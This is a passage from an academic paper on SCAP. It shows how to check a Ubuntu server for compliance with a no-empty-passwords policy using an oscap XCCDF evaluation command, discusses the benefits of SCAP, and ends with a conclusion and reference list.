More concretely, let us suppose that an organisation has to check whether the currently installed infrastructure complies with some internal policies, such as forbidding empty passwords. This verification is a piece of cake for an administrator: check on each system that there is no instance of the nullok option (which permits empty passwords) in /etc/pam.d/system-auth. However, the complexity of the assessment increases rapidly with the number of rules to test and the number of hosts to be assessed. Sometimes, assessing organization policies requires specialized knowledge and security experts. This can quickly become too costly.
C. Automated solution with SCAP
As mentioned in section II-B, an interesting use case of SCAP is policy compliance checking. To illustrate this, we test the previously-defined password policy against a checklist in the XCCDF language, using an open-source tool. Thus, in order to check for empty passwords as in section III-B, we just need to download the corresponding rule from the NVD and install a tool on the target system. The check can even be performed remotely from a central system by using a specific tool over the SSH protocol (e.g. with oscap-ssh). In the present case, we test a local solution in a virtual machine.
In order to execute the test with the given tool, we adapt the password policy into an XCCDF file downloaded from the NVD, by defining a profile containing the rules referring to OVAL definitions (also downloaded), thus forming a benchmark for the given platform. Afterwards, we execute the following simple command on the targeted system:
oscap xccdf eval \
  --profile xccdf_password_policy \
  --cpe ubuntu-cpe.xml \
  --oval-results \
  --results results.xml \
  --report results.html \
  ubuntu-xccdf.xml
• oscap xccdf eval ubuntu-xccdf.xml tests the system against the given benchmark
• --profile selects the right profile, that is, the one for Ubuntu Server 14.04, defined for our specific policy
• --cpe selects the right platform enumeration (providing metadata)
• --oval-results enables inclusion of additional OVAL information in the XCCDF report
• --results generates the given XML file with the XCCDF results
• --report generates a human-readable HTML report with very detailed information
Figure 6. SCAP workflow applied to the simple use case.
Figure 6 presents the workflow for the simple use case. XCCDF checks the CPE item against some OVAL tests based on CCE items from the password policy rules, then generates an XML file with the results and the corresponding HTML report.
The hardest work is certainly creating our own benchmark, which requires some knowledge of the standard and of the controls related to the tested password policy. Fortunately, SCAP content from the main available sources, such as the NVD or the Exploit Database, contains a broad database of benchmarks, and the one we need can easily be found and tailored to the policy.
The final report contains a lot of metadata about the configuration items, their potential misconfiguration, and the remediations that can be performed. A nice feature of SCAP is that its ARF specification provides a standardized reporting structure that can be used to generate a user-friendly report in the form of guidance documentation. Figure 7 shows the summary list of the check status for each tested rule, as an introduction to the generated report. Each rule in the shown table links to a section with detailed information.
D. Added value
From the explanations of subsections III-B and III-C on the simple use case, we can see that, thanks to SCAP, it's very simple to perform a quick compliance-checking test on a common system relying on public resources, far easier than with a manual solution.
By using a standard such as SCAP, security information sharing and security automation are made
convenient. As current SCAP content gathers a large quantity of knowledge, security experts can
simply behave as content consumers and thus spare a significant amount of time.
On the other hand, security experts can also contribute as content producers, and dealing with the XML schemas quickly becomes complex and costly. SCAP content is thus dependent on the manpower available for feeding the repositories, and the content is not necessarily complete. However, the SCAP community enjoys many contributing organizations, making the SCAP content a reliable source for security automation.
As a proof of efficiency, we can mention a few already-released SCAP-validated products from major software companies, such as the Microsoft SCAP extensions for Microsoft System Center Configuration Manager 3.0, Tenable SecurityCenter 5 or Qualys SCAP Auditor 1.2 [18].
IV. CONCLUSION
SCAP is an evolutionary effort of the information security community. It will continue to progress
from its current version 1.2 with emerging specifications such as CRE for automating remediations.
As its usage seems to continuously grow, SCAP will certainly remain a reliable and efficient source
for supporting security experts’ work.
REFERENCES
[1] NIST, The Technical Specification for the Security Content Automation Protocol (SCAP): SCAP Version 1.2, Sept 2011, rev. 2.
[2] P. Kampanakis, "Security automation and threat information-sharing options," Security & Privacy, IEEE, vol. 12, no. 5, pp. 42–51, Sept 2014.
[3] R. Montesino and S. Fenz, "Automation possibilities in information security management," in Intelligence and Security Informatics Conference (EISIC), 2011 European, Sept 2011, pp. 259–262.
[4] S. Radack and R. Kuhn, "Managing security: The security content automation protocol," IT Professional, vol. 13, no. 1, pp. 9–11, Jan 2011.
[5] National Vulnerability Database. [Online]. Available: https://nvd.nist.gov/
[6] OpenSCAP. Oscap tool. [Online]. Available: http://www.open-scap.org/
[7] Arellia. Security analysis solution. [Online]. Available: http://www.arellia.com/products/security-analysis-solution/
[8] CIS Critical Security Controls. [Online]. Available: http://www.cisecurity.org/critical-controls/
[9] A. Nakamura, "Towards unified vulnerability assessment with open data," in Computer Software and Applications Conference Workshops (COMPSACW), 2013 IEEE 37th Annual, July 2013, pp. 248–253.
[10] K. Ingols, M. Chu, R. Lippmann, S. Webster, and S. Boyer, "Modeling modern network attacks and countermeasures using attack graphs," in Computer Security Applications Conference, 2009. ACSAC '09. Annual, Dec 2009, pp. 117–126.
[11] E. Al-Shaer and M. Alsaleh, "ConfigChecker: A tool for comprehensive security configuration analytics," in Configuration Analytics and Automation (SAFECONFIG), 2011 4th Symposium, Oct 2011, pp. 1–2.
[12] M. Alsaleh and E. Al-Shaer, "SCAP based configuration analytics for comprehensive compliance checking," in Configuration Analytics and Automation (SAFECONFIG), 2011 4th Symposium, Oct 2011, pp. 1–8.
[13] C.-L. Kuo and C.-H. Yang, "Security design for configuration management of android devices," in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, July 2015, pp. 249–254.
[14] M. Aslam, C. Gehrmann, and M. Björkman, "Continuous security evaluation and auditing of remote platforms by combining trusted computing and security automation techniques," in Proceedings of the 6th International Conference on Security of Information and Networks, ser. SIN '13. New York, NY, USA: ACM, 2013, pp. 136–143. [Online]. Available: http://doi.acm.org/10.1145/2523514.2523537
[15] R. Savola and P. Heinonen, "Security-measurability-enhancing mechanisms for a distributed adaptive security monitoring system," in Emerging Security Information, Systems and Technologies (SECURWARE), 2010 Fourth International Conference on, July 2010, pp. 25–34.
[16] OVAL repository. [Online]. Available: https://oval.mitre.org/repository/
[17] GovReady. Ubuntu-scap project. [Online]. Available: https://github.com/GovReady/ubuntu-scap
[18] SCAP validated products. [Online]. Available: https://nvd.nist.gov/SCAP-Validated-Tools/